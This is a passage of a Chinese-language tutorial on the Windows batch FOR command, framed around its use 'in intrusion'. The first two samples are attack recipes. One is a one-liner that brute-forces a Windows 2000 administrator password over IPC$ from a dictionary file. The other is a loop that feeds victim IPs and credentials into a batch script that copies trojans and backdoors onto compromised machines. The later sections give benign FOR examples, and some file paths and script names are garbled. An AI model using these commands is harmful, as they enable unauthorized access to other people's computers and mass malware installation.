以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2:

利用For命令来实现对一台目标Win2k主机的暴力密码破解。

我们用net use file://ip/ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下 密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use file://ip/ipc$ "i%" /u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给 find命令--
for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator"│find ":命令成功完

成">>D:ok.txt ,这样就ko了。

sample3:

你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会

变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵

,看下去你就会明白了。

主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数

%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码

(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容

是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password usernam

下面这文章是我收藏的FOR的经典应用


1. 可以用 /r 参数遍历整个目录树
2. 可以用 /f 参数将文本文件内容作为循环范围
3. 可以用 /f 参数将某一命令执行结果作为循环范围
4. 可以用 %~ 操作符将文件名分离成文件名、扩展名、盘符等独立部分

现分别举例说明如下:


1. 用 /r 遍历目录树
当用 *.* 或 *.txt 等文件名通配符作为 for /r 的循环范围时,可以对当前目录下所有文件(包括子目录里面的文件)进行操作。举个例子,你想在当前目录的所有txt文件(包括子目录)内容中查找"bluebear"字样,但由于find本身不能遍历子目录,所以我们用for:

for /r . %a in (*.txt) do @find "bluebear" %a

find 前面的 @ 只是让输出结果不包括 find 命令本身。这是DOS很早就有的功能。和FOR无关。
当用 . 作为循环范围时,for 只将子目录的结构(目录名)作为循环范围,而不包括里面的文件。有点象 TREE 命令,不过侧重点不同。TREE 的重点是用很漂亮易读的格式输出,而FOR的输出适合一些自动任务,例如,我们都知道用CVS管理的项目中,每个子目录下都会有一个CVS目录,有时在软件发行时我们想把这些CVS目录全部去掉:

for /r . %a in (.) do @if exist %aCVS rd /s /q %aCVS

先用 if exist 判断一下,是因为 for 只是机械的对每个目录进行列举,如果有些目录下面没有CVS也会被执行到。用 if exist 判断一下比较安全。
这种删除命令威力太大,请小心使用。最好是在真正执行以上的删除命令前,将 rd /s /q 换成 @echo 先列出要删出的目录,确认无误后再换回rd /s /q:

for /r . %a in (.) do @if exist %aCVS @echo %aCVS

可能目录中会多出一层 ".",比如 c:projrelease.CVS ,但不会影响命令的执行效果。
2. 将某一文件内容或命令执行结果作为循环范围:
假如你有一个文件 todel.txt,里面是所有要删除的文件列表,现在你想将里面列出的每个文件都删掉。假设这个文件是每个文件名占一行,象这样:

c:tempa1.txt
c:tempa2.txt
c:tempsubdirb3.txt
c:tempsubdirb4.txt

那么可以用FOR来完成:

for /f %a in (todel.txt) do del %a

这个命令还可以更强大。比如你的 todel.txt 并不是象上面例子那么干净,而是由DIR直接生成,有一些没用的信息,比如这样:

Volume in drive D is DATA
Volume Serial Number is C47C-9908
Directory of D:tmp
09/26/2001 12:50 PM 18,426 alg0925.txt
12/02/2001 04:29 AM 795 bsample.txt
04/11/2002 04:18 AM 2,043 invitation.txt
4 File(s) 25,651 bytes
0 Dir(s) 4,060,700,672 bytes free

for 仍然可以解出其中的文件名并进行操作:

for /f "skip=5 tokens=5" %a in (todel.txt) do @if exist %a DEL %a

当然,上面这个命令是在进行删除,如果你只是想看看哪些文件将被操作,把DEL换成echo:

for /f "skip=5 tokens=5" %a in (todel.txt) do @if exist %a echo %a

你将看到:

alg0925.txt
bsample.txt
invitation.txt

skip=5表示跳过前5行(就是DIR输出的头部信息),tokens=5表示将每行的第5列作为循环值放入%a,正好是文件名。在这里我加了一个文件存在判断,是因为最后一行的"free"刚好也是第5列,目前还想不出好的办法来滤掉最后两行,所以检查一下可保万无一失。
3. 可以用 /f 参数将某一命令执行结果作为循环范围
非常有用的功能。比如,我们想知道目前的环境变量有哪些名字(我们只要名字,不要值)。可是SET命令的输出是“名字=值”的格式,现在可以用FOR来只取得名字部分:

FOR /F "delims==" %i IN ('set') DO @echo %i

将看到:

ALLUSERSPROFILE
APPDATA
CLASSPATH
CommonProgramFiles
COMPUTERNAME
ComSpec
dircmd
HOMEDRIVE
......

这里是将set命令执行的结果拿来作为循环范围。delims==表示用=作为分隔符,由于FOR /F默认是用每行第一个TOKEN,所以可以分离出变量名。如果是想仅列出值:

FOR /F "delims== tokens=2" %i IN ('set') DO @echo %i

tokens=2和前例相同,表示将第二列(由=作为分隔符)作为循环值。
再来个更有用的例子:
我们知道 date /t (/t表示不要询问用户输入)的输出是象这样的:

Sat 07/13/2002

现在我想分离出日期部分,也就是13:

for /f "tokens=3 delims=/ " %a in ('date /t') do @echo %a

实际上把 tokens后面换成1,2,3或4,你将分别得到Sat, 07, 13和2002。注意delims=/后面还有个空格,表示/和空格都是分隔符。由于这个空格delims必须是/f选项的最后一项。
再灵活一点,象本文开头提到的,将日期用2002-07-13的格式输出:

for /f "tokens=2,3,4 delims=/ " %a in ('date /t') do @echo %c-%a-%b

当tokens后跟多个值时,将分别映射到%a, %b, %c等。实际上跟你指定的变量有关,如果你指定的是 %i, 它们就会用%i, %j, %k等。
灵活应用这一点,几乎没有做不了的事。
4. 可以用 %~ 操作符将文件名分离成文件名、扩展名、盘符等独立部分
这个比较简单,就是说将循环变量的值自动分离成只要文件名,只要扩展名,或只要盘符等等。
例:要将 c:mp3下所有mp3的歌名列出,如果用一般的 dir /b/s 或 for /r ,将会是这样:

g:mp3Archived5-18-01-A游鸿明-下沙游鸿明-01 下沙.mp3
g:mp3Archived5-18-01-A游鸿明-下沙游鸿明-02 21个人.mp3
......
g:mp3Archived5-18-01-A王菲-寓言王菲-阿修罗.mp3
g:mp3Archived5-18-01-A王菲-寓言王菲-彼岸花.mp3
g:mp3Archived5-18-01-A王菲-寓言王菲-不爱我的我不爱.mp3
......

如果我只要歌名(不要路径和".mp3"):

游鸿明-01 下沙
游鸿明-02 21个人
......
王菲-阿修罗
王菲-彼岸花
王菲-不爱我的我不爱
......

那么可以用FOR命令:

for /r g:mp3 %a in (*.mp3) do @echo %~na

请使用浏览器的分享功能分享到微信等